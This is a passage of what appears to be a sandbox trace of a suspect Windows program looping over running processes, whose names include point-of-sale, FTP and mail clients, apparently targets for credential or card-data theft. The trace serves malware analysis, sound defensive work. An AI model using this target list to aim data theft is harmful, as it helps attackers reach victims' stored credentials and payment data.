th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0158.294] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0158.297] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0158.300] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0158.302] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0158.305] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0158.307] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0158.309] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0158.315] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0158.318] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0158.321] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0158.324] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0158.326] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0158.329] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0158.331] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0158.334] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0158.337] CloseHandle (hObject=0x1bf0) returned 1 [0158.337] Sleep (dwMilliseconds=0x64) [0158.472] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b78 [0158.489] Process32First (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.491] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0158.494] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0158.497] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0158.499] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0158.502] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0158.504] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0158.545] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0158.548] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0158.550] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.553] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.555] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0158.558] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.560] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.563] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.570] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.574] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.576] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.578] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.629] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0158.632] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0158.635] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0158.638] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0158.640] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.642] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0158.643] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0158.645] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0158.647] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0158.649] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0158.651] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0158.653] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.655] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0158.656] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0158.658] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0158.660] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0158.662] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.665] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0158.712] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0158.714] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0158.715] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0158.718] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0158.720] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0158.722] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0158.724] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0158.727] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0158.729] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0158.731] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0158.733] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0158.734] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0158.736] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0158.738] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0158.739] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0158.741] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0158.742] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0158.744] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0158.745] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0158.750] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0158.752] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0158.754] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0158.756] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0158.758] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0158.760] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0158.762] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0158.764] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0158.767] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0158.770] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0158.774] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0158.776] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0158.779] Process32Next (in: hSnapshot=0x1b78, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 